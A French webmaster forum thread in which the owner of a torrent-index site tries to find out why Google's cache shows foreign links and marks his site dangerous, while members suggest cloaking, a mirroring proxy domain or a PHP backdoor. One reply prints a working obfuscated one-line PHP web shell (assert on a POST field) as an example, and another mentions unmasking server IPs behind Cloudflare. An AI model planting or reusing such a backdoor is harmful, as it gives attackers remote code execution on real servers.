[URGENT] Un site remplace mes liens dans le cache Google

Nouveau WRInaute
Bonjour,

Lorsque je tape :

https://webcache.googleusercontent.com/search?q=cache:www.monsite.com
https://webcache.googleusercontent.com/search?q=cache:monsite.com

Je vois que c'est bien mon site affiché, mais tous les liens ne sont pas du tout les miens. Je me suis fait hacké le site et Google m'indique que mon site est "dangereux" donc il est bloqué.

J'ai vérifier le serveur, tous les fichiers du site, apparemment tout est OK.

J'ai renvoyé la sitemap sur Google Tools, et bien ajouter toutes les propriété. J'ai vérifier mon compte Google rien à redire.

Comment rétablir cela ?

Je ne peux pas donner le lien car c'est un site pour adulte.
 
Nouveau WRInaute
Si, lorsque je fais une exploration comme Google, il me sort un site propre

En plus le site n'est pas très gros, comment le hacker a t il pu modifier le cache ?
 
Nouveau WRInaute
Au final ma question : comment quelqu'un peut modifier le cache d'un site sans que la personne n'ai accès au site ?

Je n'utilise pas de CMS.
 
WRInaute occasionnel
Boumba a dit:
Au final ma question : comment quelqu'un peut modifier le cache d'un site sans que la personne n'ai accès au site ?
Oui, justement en le piratant. Ce qui me paraît bizarre, c'est que Google affiche un piratage: alors que ta navigation personnelle semble correcte. Le pirateur fait peut-être du cloaking sur ton adresse IP (ou une autre méthode).

Fait déjà ping http://www.on_site.com et vérifie si le site est encore hébergé sur ton propre hébergement.
En deuxième, sio ton site est correct, il y a une deuxième méthode, c'est de faire passer le visiteur (ou Google) par un proxy qui va automatiquement modifier les adresses à sa convenance (technique utilisée par quelques bestioles publicitaires pour afficher d'autres pubs sur les sites que celles présentes dans le navigateur du visiteur).

Et comme les autres, sans adresse ... en MP par exemple.

Comme dans tous les cas de hacking: modifier le mot de passe FTP, remplacer le contenu du site par l'original de ton PC et VERIFIER les logs d'accès ... en plus de supprimer les codes sources de piratages.
 
WRInaute accro
Ça sent le cloaking sur user-agent, assez habituel en fait. Essaie d'installer un plugin Firefox du type user-agent switcher, fais-toi passer pour Google et navigue sur le site, pour voir.
 
Nouveau WRInaute
J'ai pensé au Cloaking

J'ai essayé :

- Plusieurs Navigateurs
- Plusieurs Proxys
- Plusieurs VPNs
- Tor
- Explorer comme Google (via la console)

J'ai vérifier tous les fichiers, toutes les connexions SSH, les logs, les DNS chez CloudFlare ainsi que chez mon Registar, rien n'a bougé. Tout est parfaitement légitime.

Je doute que les fichiers ont été modifiés, j'ai un cron qui vérifie toutes les heures si y'a des modifications dans la structure du site.

Je viens de refaire une demande d'examen, échec. :evil: :evil: :evil:

Y'a pas un moyen de contacter Google et parlé à quelqu'un qui peut gérer mon problème ?

Je vous donne le site : http://www.omgtorrent.me/

Le site est légal, y'a rien à télécharger, c'est une simple base de données.

Le cache qui pose problème :

https://webcache.googleusercontent.com/search?q=cache:eek:mgtorrent.me
https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.me

C'est ce site : http://www.omgtorrent.usbypass.webcam/ qui me "baise" la gueule.

Je ne comprends pas , mes compétences s'arrête là. je suis perdu. ça fait 3 jours que je me tire les cheveux pour trouver une solution.
 
WRInaute accro
Boumba a dit:
Le site est légal, y'a rien à télécharger, c'est une simple base de données.

Lol, l'essentiel c'est de le croire. Mais non, c'est tout sauf légal.

Pour le reste, il semble que tu as mis en place un mécanisme qui empêche l'accès au site.
 
WRInaute occasionnel
On va commencer par le début.
1. extension .me = une petite ile avec 90% de brols (sur mes sites: interdit de visite).
2. En visitant le site et en cliquant sur les parties à droite= piratage à la première visite, ensuite plus rien (du coup tu vois plus rien ensuite).
3. redirection CNS vers canada (gonflé quand même)

Ce genre de bricolage peut pas être de type HTaccess ou bricolage de DNS, mais bien PHP. Revoit ton code.
 
WRInaute accro
Boumba a dit:
[
Non, c'est une simple base de donnée y'a rien à télécharger.

Tu fais des liens vers des sites qui proposent de télécharger. Il y a déjà eu des condamnations pour ce genre de chose (on en a même parlé ici, quand d'autres ayant ce genre de sites sont venus demander des avis).

Donc si, c'est illégal. ne pas le reconnaître, ça s'appelle de la mauvaise foi.
 
Nouveau WRInaute
patrick_lejeune a dit:
On va commencer par le début.
1. extension .me = une petite ile avec 90% de brols (sur mes sites: interdit de visite).
2. En visitant le site et en cliquant sur les parties à droite= piratage à la première visite, ensuite plus rien (du coup tu vois plus rien ensuite).
3. redirection CNS vers canada (gonflé quand même)

Ce genre de bricolage peut pas être de type HTaccess ou bricolage de DNS, mais bien PHP. Revoit ton code.

2. Pas très bien compris ?

3. C'est quoi une redirection CNS ? pas compris aussi :/

Je ne redirige rien spécialement pourtant.
 
Nouveau WRInaute
UsagiYojimbo a dit:
Boumba a dit:
[
Non, c'est une simple base de donnée y'a rien à télécharger.

Tu fais des liens vers des sites qui proposent de télécharger. Il y a déjà eu des condamnations pour ce genre de chose (on en a même parlé ici, quand d'autres ayant ce genre de sites sont venus demander des avis).

Donc si, c'est illégal. ne pas le reconnaître, ça s'appelle de la mauvaise foi.

Les sites rediriger ne propose pas les fichiers non plus.
 
WRInaute occasionnel
Boumba a dit:
patrick_lejeune a dit:
On va commencer par le début.
1. extension .me = une petite ile avec 90% de brols (sur mes sites: interdit de visite).
2. En visitant le site et en cliquant sur les parties à droite= piratage à la première visite, ensuite plus rien (du coup tu vois plus rien ensuite).
3. redirection CNS vers canada (gonflé quand même)

Ce genre de bricolage peut pas être de type HTaccess ou bricolage de DNS, mais bien PHP. Revoit ton code.

Pardon DNS, c'est ce qui redirige en nom de domaine vers l'adresse d'un serveur.
UsagiYojimbo et d'autres t'on signalé que ton site est hors la loi. Personnellement, je t'ai donné des pistes et je vais en rester là.
 
Nouveau WRInaute
Les redirections DNS sont gérées par cloudflare, donc ça dépend de ton pays.

je ne vois pas ce qui est illégal.

Je propose une simple base de données qui répertorie les films, c'est comme les sites qui répertorie les différentes variétés de Cannabis par exemple.

Je peux comprendre que c'est douteux.

Bref, les pistes que tu m'as donné :

1. l'extension .me c'est une extension comme une autre .com .fr .pw ....etc
2. j'ai strictement rien compris, j'ai testé sur 10 navigateurs differents, téléphones tablettes, j'ai rien remarqué et je n'ai pas saisi ton message, pas claire du tout.
Si tu parles de ça : https://i.imgur.com/z1BDzr4.png
C'est pour ça que je suis ici
3. la redirection dns est donc gérée par cloudflare, je ne suis pas tributaire, le site est hosté en france pas au canada.


Je savais que je ne devais pas donner le lien, ... la prochaine fois je fermerais ma bouche

J'aimerai juste comprendre le soucis, comme la personne qui gére le site : usbypass.webcam a pu changer mon cache, sachant que je n'ai pas eu d'intrusion.
 
Nouveau WRInaute
UsagiYojimbo a dit:
Cherche dans ton code PHP, au vu de ce qui se passe sur le site, le problème vient de là.

Il se passe quoi sur le site exactement ? moi je ne vois rien de spécial..

Svp, aidez moi, j'en peux plus là, je comprends pas comment ce mec a fait son coup ...........
 
WRInaute impliqué
est ce que sur ton serveur tu écoute sur le servername correspondant uniquement à ton site ?
genre si tu tape l'ip de ton serveur dans le navigateur ça marche ou pas ?
 
WRInaute impliqué
tu pourrais essayer de faire l'inverse, n'afficher le site que quand l'utilisateur demande via ton nom de domaine.
parce que sinon, le mec a juste à faire pointer son domaine vers ton ip pour que ton site s'affiche quand on va sur son domaine
 
Nouveau WRInaute
madri2 a dit:
tu pourrais essayer de faire l'inverse, n'afficher le site que quand l'utilisateur demande via ton nom de domaine.
parce que sinon, le mec a juste à faire pointer son domaine vers ton ip pour que ton site s'affiche quand on va sur son domaine

j'avais pensé à ça, mais pour trouver l'ip quand on passe par cloudflare, c'est pas possible, donc je ne pense pas qu'il ai l'ip.

Mais j'ai ajouter cette protection quand même
 
WRInaute impliqué
ce n'est pas impossible de trouver l'ip d'un serveur derrière cloudflare, j'ai déjà trouvé des ips de plusieurs serveurs utilisant cloudflare ou équivalent
 
WRInaute occasionnel
Boumba a dit:
Je savais que je ne devais pas donner le lien, ... la prochaine fois je fermerais ma bouche
Sans lien, on ne donnait aucune solution (aucune piste). Avec le lien, on te tombe dessus :roll:
Dur la vie d'un webmaster :oops:
On a discuté en MP avec quelques membres ... suis par sur le bon ordi. Te donnerais quelques pistes pour les copieurs demain.

ce n'est pas impossible de trouver l'ip d'un serveur derrière cloudflare, j'ai déjà trouvé des ips de plusieurs serveurs utilisant cloudflare ou équivalent
et plusieurs fois, j'ai donné la piste pour interdire COMPLETEMENT les visites des sites hébergés sur ce brol: interdiction complètes des adresses utilisant ce BROL.
 
Nouveau WRInaute
madri2 a dit:
ce n'est pas impossible de trouver l'ip d'un serveur derrière cloudflare, j'ai déjà trouvé des ips de plusieurs serveurs utilisant cloudflare ou équivalent

si tu fais les bonnes manipulations et n'utilise pas d'email ou d'image distante et utilise les DNS A uniquement, ou utiliser crimeflare par exemple mais bon y'a pas de grand risque, bref passons ce n'est pas le problème :p

Ok patrick_lejeune

C'est de la faute de google, il intégre un cache d'un autre site pour le mien, ça me rend fou cette histoire :(
 
WRInaute occasionnel
Boumba a dit:
Je donne 0.3 BITCOIN A CELUI QUI PEUT M'AIDER CORRECTEMENT !
Comme dirait ma fille quand je la chahute: MDR (c'est pas ma génération mais je pense que ca veut dire Mort De Rire).
Regarde le profil de ceux qui répondent, la majorité sont sur WRI depuis de 10 ans (gratuitement).

Ca fait deux mois que j'en parle sur WRI (mais trop de boulots), vais adapter dans la semaine un outils de détection ... juste afficher.
 
Nouveau WRInaute
UsagiYojimbo a dit:
Il n'intègre pas le cache d'un autre site, tu t'es fait hacker.

J'ai tout vérifier, même les fichiers, il n'y a jamais eu de modification. :(

J'ai tjs le probleme, impossible à régler.

Ceci est le cache Google de http://xxxbbwvids.com/. Il s'agit d'un instantané de la page telle qu'elle était affichée le 2 févr. 2017 23:04:44 GMT.

Le site à cette date, était comme il est actuellement vu que j'étais là. C'est impossible. :evil:
 
WRInaute accro
Et pourtant si le cache correspond à ta page en dehors de ces liens, c'est que tu t'es fait hacker. Que ce soit au niveau des fichiers ou de la Base de Données.
 
Nouveau WRInaute
UsagiYojimbo a dit:
Et pourtant si le cache correspond à ta page en dehors de ces liens, c'est que tu t'es fait hacker. Que ce soit au niveau des fichiers ou de la Base de Données.

Comment on fait pour connaitre la méthode utilisé ?

J'ai tout bloqué. :(

J'ai vérifier tous les logs, tout ce qui est possible je ne trouve rien.
 
Nouveau WRInaute
spout a dit:
T'as vérifié quoi dans les logs ? Quoi dans le code ? Les eval/... et toutes ces techniques ?

dans tous les /var/log/auth.log & /var/log/apache2

les fichiers php j'ai un script cron qui m'envoie un mail si y'a la moindre modification de tous les fichiers du repertoire /var/www

Je remarque que le cache de :

https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.com

C'est pareil ? vu que le .com renvoie en 301 vers le .me
 
WRInaute impliqué
un backdoor peut être présent même sans eval
un backdoor peut être aussi bidon que :
${$_GET['a']}

(à peu de choses près)

edit: voici un exemple de vrai backdoor :
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['yt']);?>
 
WRInaute impliqué
scan ton pc avec un antivirus, vérifie que les ips de serveur configurées sur cloudflare sont celles de ton serveur,
change tes mots de passes.
Quelles sont tes méthodes pour affirmer qu'aucun fichier n'a été modifié ?
 
Nouveau WRInaute
Je compare, tous les jours, les hashs des fichiers de mon pc à ceux sur le ftp

j'ai vérifié tous les DNS ainsi que des possibles connexion aux interfaces, y'a rien, et je n'ai reçu aucune alerte

le mot de passe root ainsi que le compte utilisateur a été changé

mon pc n'a pas de virus, je ne télécharge aucun fichier sur celui-ci, mais j'ai fait 3 scans différents avec 3 anti virus différent au cas où, y'a rien.


je suis totalement perdu.
 
WRInaute accro
Es-tu au moins sûr de ta tâche cron qui vérifie les fichiers ? Il est aussi possible qu'il y ait eu des ajouts, et des règles supplémentaires dans le htaccess.
 
Nouveau WRInaute
UsagiYojimbo a dit:
Es-tu au moins sûr de ta tâche cron qui vérifie les fichiers ? Il est aussi possible qu'il y ait eu des ajouts, et des règles supplémentaires dans le htaccess.

Oui je lance le logiciel tous les jours, il compare tous les hashs des fichier img, css, php, js ...etc sur mon PC et je les compare à ceux sur le serveu, la moindre modification j'ai une alerte.

J'ai re-vérifier quand je l'ai lancé : 29 , 30, 31 janvier, 1,2,3,4,5 février.

J'ai vérifier la configuration de .conf de apache, rien n'a été modifié, vu que la dernière date de modif de septembre 2016 et aucun fichier n'a été copié / déplacer dans le répertoire /etc/apache2

je suis sur que je n'ai pas été hacké.
 
WRInaute accro
Et pourtant, il n'y pas d'autres solutions. Tu as vérifie dans les fichiers la présence de codes suspects ? Des eval(base64( et trucs du genre ?

Et tu as vérifié en contenu en base de donnée ?
 
Nouveau WRInaute
UsagiYojimbo a dit:
Et pourtant, il n'y pas d'autres solutions. Tu as vérifie dans les fichiers la présence de codes suspects ? Des eval(base64( et trucs du genre ?

Et tu as vérifié en contenu en base de donnée ?

Oui j'ai vérifié la base de donné, rien de spécial.

J'ai fait un coup de rkhunter, chrootkit & https://github.com/nbs-system/php-malware-finder

j'ai bloqué l'ip de https://usbypass.webcam/ mais vu qu'il utilise cloudflare, c'est inutile :(
 
Nouveau WRInaute
ce que je ne comprends, comment on fait pour mettre à jour le cache de google ? lui il y arrive sur un autre domaine, et moi sur mon vrai domaine, j'y arrive pas ...

mon site est foutu alors ? vu que personne sait me renseigner, et moi je suis trop incompétent

quelle solution ai-je concrètement ?

L'iP DU SERVEUR : 89.35.39.197

https://omgtorrent.usbypass.webcam/
Je l'ai bloqué sur cloduflare, on peut voir que c bloqué

pareil pour http://xxxbbwvids.com
 
WRInaute accro
mon site est foutu alors ? ../.. quelle solution ai-je concrètement ?

delete-ruthlessly.jpg


C'est de l'humour hein..... :D :D :D :D
 
Nouveau WRInaute
vu que j'ai bloqué les 2 sites qui me font chier, peut être que google va accepter de valider mon site

c'est ça que je comprend pas, il veut pas le valider car y'a un virus, alors que c un autre site qui vol mon cache

personne ne peut m'aider ? :(
 
WRInaute accro
Montre moi ce qui est illégal et je ferme le site.

C'est pourtant simple.... Les torrent ne sont pas illégaux en soi..

En revanche, donner des liens vers des fichiers illégaux l'est... Si ton site donne acces a un contenu illegal, ce qui est le cas, que celui ci soit heberge chez toi ou ailleurs ca ne change rien au fait que c'est toujours illegal.

ET franchement encore utiliser Torrents aujourd'hui, faut vraiment etre nunuche...

Apres c'est comme les excès de vitesse sur l'autoroute, personne ne t'empêcheras de rouler a 200, il est juste interdit de se faire prendre... et tot ou tard....

Et si vraiment tu etais si serein que ca, cette page n'existerai pas :
https://www.omgtorrent.me/comment-filtrer-les-ips-indesirables-sur-bit ... adopi.html

Franchement...

:D
 
Nouveau WRInaute
Furtif a dit:
Montre moi ce qui est illégal et je ferme le site.

C'est pourtant simple.... Les torrent ne sont pas illégaux en soi..

En revanche, donner des liens vers des fichiers illégaux l'est... Si ton site donne acces a un contenu illegal, ce qui est le cas, que celui ci soit heberge chez toi ou ailleurs ca ne change rien au fait que c'est toujours illegal.

ET franchement encore utiliser Torrents aujourd'hui, faut vraiment etre nunuche...

Apres c'est comme les excès de vitesse sur l'autoroute, personne ne t'empêcheras de rouler a 200, il est juste interdit de se faire prendre... et tot ou tard....

Et si vraiment tu etais si serein que ca, cette page n'existerai pas :
https://www.omgtorrent.me/comment-filtrer-les-ips-indesirables-sur-bit ... adopi.html

Franchement...

:D

Alors, aucun lien n'est diffusé, c'est plutôt un attrape nigaud tu comprends ?

Ensuite, des liens comme https://www.vice.com/fr/article/comment-devenir-un-fraudeur-de-cartes-bleues & http://www.konbini.com/fr/tendances-2/fini-les-dealers-je-chope-ma-wee ... -internet/ sont pire que moi je pense

omgtorrent est surement "douteux" je le reconnais, mais pas illégal en soit, on ne propose aucun fichier, et aucun lien vers du contenu illégal, car usenet, c'est du attrape nigaud, y'a des sites pire que les miens, mais vous les aidez quand même :p
 
WRInaute accro
mais vous les aidez quand même :p

Rôôôôôôôôô WRI repaire de hackers....

c'est plutôt un attrape nigaud tu comprends ?

T'en es fier ? et c'est pire encore, c'est de l'arnaque

y'a des sites pire que les miens,

C'est sûr, il y a toujours pire, ca permet de se donner bonne conscience...

ET comprends bien que je ne te jette pas la pierre, j'ai fait pire il fut un temps.. mais j'ai raccroché mes gants et emprunté la voie de la sagesse il y a un peu plus de 10 ans..
 
WRInaute occasionnel
Ca dégénère :roll:

On récapitule:
1. le site est hors chartre et ... hors législation (pas trop discuter ... > Boomba)
2. en visitant le site, tout semble correct sauf:
. première vite et pubs hors normes (Patrick ... moi)
. site nettoyé (m'en doute, surement pas) et réponse de SPOUT iden puisque le problème reste.

Ce forum est un espace d'échange et de compréhension: on peut tous (débutant comme vieille bête de WRI) se retrouver avec un problème identique.
C'est pas la première fois cette année que ca part de "hors ...". Personnellement, je suis pas d'accord avec le site et sa thématique mais le type de piratage (copie) peut aider des Webmasters à corriger un problème sur d'autres sites.
> Boomla: les gros MP ne changent pas mon boulot sur WRI (je l'ai effacé sans le lire): il y a 5 ans, ma boîte débordais.
On reprend au début (en oubliant la thématique discutable du site).
Patrick
> Tu attend et nous laisse travailler (merci)
On commence par des trucs simples: les pubs à droite: tu vire temporairement (et pas redemander dans l'heure une redemande Google). analyse anti-virus sur ton PC . malwarebyte. Retransfert le site par FTTp en cheangeant sur l'hébergement tous les codes avant.
 
Nouveau WRInaute
patrick_lejeune a dit:
On commence par des trucs simples: les pubs à droite: tu vire temporairement (et pas redemander dans l'heure une redemande Google). analyse anti-virus sur ton PC . malwarebyte. Retransfert le site par FTTp en cheangeant sur l'hébergement tous les codes avant.

Les pubs : je vais les retirer, mais je doutes que ça soit, car ça reste des pubs de régie pubs légitimes, j'en ai déjà parlé avec la personne qui s'occupe de ça, y'a aucun probleme

Analyse anti virus : comme dit plus haut, fait 3 fois avec 3 AV differents, Malware pareil

Changement des mots de passes (2, root et user), màj du serveur, mais il est en constante màj, tous les jours en cron

Restransfert : FTP : fait et refait :O

je vais devoir attendre que google mette à jour son cache :

https://webcache.googleusercontent.com/search?q=cache:www.omgtorrent.me
https://webcache.googleusercontent.com/search?q=cache:eek:mgtorrent.me
 
WRInaute accro
Sauf que si tu n'as rien changé, le problème est toujours là. Tu a lancé des scripts pour tester si tes fichiers étaient corrompus, mais tu as regardé manuellement ?
 
Nouveau WRInaute
UsagiYojimbo a dit:
Sauf que si tu n'as rien changé, le problème est toujours là. Tu a lancé des scripts pour tester si tes fichiers étaient corrompus, mais tu as regardé manuellement ?

Honnetement, ça fait 5 jours que je fais tout ce qui est possible faire, j'ai vraiment tout fait.

J'ai même changé de serveur à l'instant.

Je pense qu'il attendre que google mette a jour son cache pour qu'il revalide mon site, je vois que ça.
 
Nouveau WRInaute
madri2 a dit:
tu vérifie le contenu de /var/www mais as tu vérifié la config de nginx

je suis sur Apache2, et oui vérifié :)

Le cache de Google a été purgé apparemment, j'ai fait une nouvelle demande.
 
Nouveau WRInaute
Toujours, pas échec

je vais me pendre, je reviens.

J'ai retiré toutes les pubs possibles, le cache a été purgé, et tjs echec, là je ne comprends pas.

J'ai fait tous les scans possibles, sur je ne sais pas combien de PC / navigateur / ip différent(e)s rien rien rien

ALLLLLLLO GOOGLE ? :mad:
 
WRInaute occasionnel
Boumba a dit:
je vais me pendre, je reviens.
Prend ton temps mais ca résoudra pas le problème :wink: .
Un petit truc me vient à l'esprit: un frame avec une espèce de redirection à partir d'un autre site. En gros, le site qui envoie le lien est vérollé et c'est ton site qui en prend une
Si c'est cela: il y plusieurs techniques :
1. par javascript (et pas suivi par les moteurs :oops: ) dans le header:
<script language="javascript" type="text/javascript">
if (top != self) {
top.location.href = location.href;
}
</script>
2. par php (c'est plus complexe puisque tu dois récupérer l'adresse effective de la page ... comme c'est un développement personnel: c'est possible).

<?php
$adresse_reel="/adresse_reel.php";
// echo $adresse."<br>";
$page=$_SERVER['REQUEST_URI'];
if ($page<>$adresse_reel)
{
// redirection (pas conseillé puisque tu reçois aussi les essais avec paramètres, notament iframe)
header('Status: 301 Moved Permanently', false, 301);
header('Location: http://www.example.com/adresse_reel.php');
// ou on interdit l'accès
// header("HTTP/1.1 403 Forbidden");
exit();
}
?>

Si c'est ce genre de brol (déjà bloqué quelques parasites de cette méthode mais mon script est plus performant avec envoi des adresses dans une table MySQL).
 
Discussions similaires
Haut